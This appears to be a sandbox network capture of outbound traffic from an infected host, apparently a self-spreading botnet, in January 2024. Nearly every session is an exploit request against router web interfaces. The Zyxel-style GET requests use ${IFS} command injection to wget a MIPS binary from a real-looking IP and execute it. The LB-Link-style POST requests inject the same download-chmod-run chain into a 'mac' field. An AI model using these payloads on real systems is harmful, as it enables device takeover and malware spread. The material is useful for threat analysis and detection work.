                                                Jan 29, 2024 07:07:55.496289015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6266192.168.2.233411036.86.248.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496330023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6267192.168.2.235117059.191.43.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496357918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6268192.168.2.2337004213.109.190.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496413946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6269192.168.2.2359392130.223.77.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496454000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6270192.168.2.233334885.9.49.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496495008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6271192.168.2.234380073.48.165.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496531010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6272192.168.2.2360940208.186.66.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496552944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6273192.168.2.234242092.180.163.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496575117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6274192.168.2.2343206118.118.171.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496644020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6275192.168.2.2342508189.30.75.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496654034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6276192.168.2.2353610170.146.150.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496684074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6277192.168.2.2360540158.114.58.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496730089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6278192.168.2.234195824.94.193.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496856928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6279192.168.2.23379905.252.233.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496900082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6280192.168.2.233460020.6.149.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496957064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6281192.168.2.2351498195.43.30.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.496992111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6282192.168.2.2350008109.210.197.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.497016907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6283192.168.2.2354592157.210.130.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.497083902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6284192.168.2.2356574144.143.249.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.497095108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6285192.168.2.233432491.156.138.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.497134924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6286192.168.2.233358878.1.195.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500068903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6287192.168.2.2356130161.194.254.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500619888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6288192.168.2.2337096144.212.212.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500665903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6289192.168.2.2339104143.124.75.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500729084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6290192.168.2.23476249.250.150.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500749111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6291192.168.2.233434036.139.102.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500802040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6292192.168.2.2359500123.188.153.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500829935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6293192.168.2.235319069.32.174.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500855923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6294192.168.2.2354750111.56.24.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500890970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6295192.168.2.2355242189.251.209.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500922918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6296192.168.2.2356862196.189.212.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.500988960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6297192.168.2.2360456211.62.151.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.501023054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6298192.168.2.2340462190.148.119.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.501076937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6299192.168.2.234854238.218.116.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.501125097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6300192.168.2.2347942134.60.108.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.501176119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6301192.168.2.235269674.87.184.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.501228094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6302192.168.2.2352468211.222.210.1798080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.799129009 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:56.080990076 CET335INHTTP/1.1 400 Bad Request
                                                Server: openresty/1.9.3.1
                                                Date: Mon, 29 Jan 2024 06:19:03 GMT
                                                Content-Type: text/html
                                                Content-Length: 178
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 39 2e 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.9.3.1</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6303192.168.2.2335588218.38.202.968080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.827079058 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:56.228678942 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:57.192625999 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:59.080321074 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:08:02.919728994 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6304192.168.2.2357274201.31.198.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498442888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6305192.168.2.2352690164.150.181.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498558998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6306192.168.2.2340568112.48.204.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498586893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6307192.168.2.2346642191.154.207.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498630047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6308192.168.2.234639636.63.44.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498672009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6309192.168.2.2355408186.204.245.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498711109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6310192.168.2.235146248.176.103.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498761892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6311192.168.2.2338564165.101.93.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498791933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6312192.168.2.234243063.26.145.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.498822927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6313192.168.2.234946479.22.200.145443
                                                TimestampBytes transferredDirectionData
